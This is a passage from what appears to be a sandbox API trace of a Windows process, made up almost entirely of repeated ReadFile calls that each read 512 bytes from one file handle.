lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.755] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.756] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.757] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.758] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.759] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.760] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.761] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.762] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 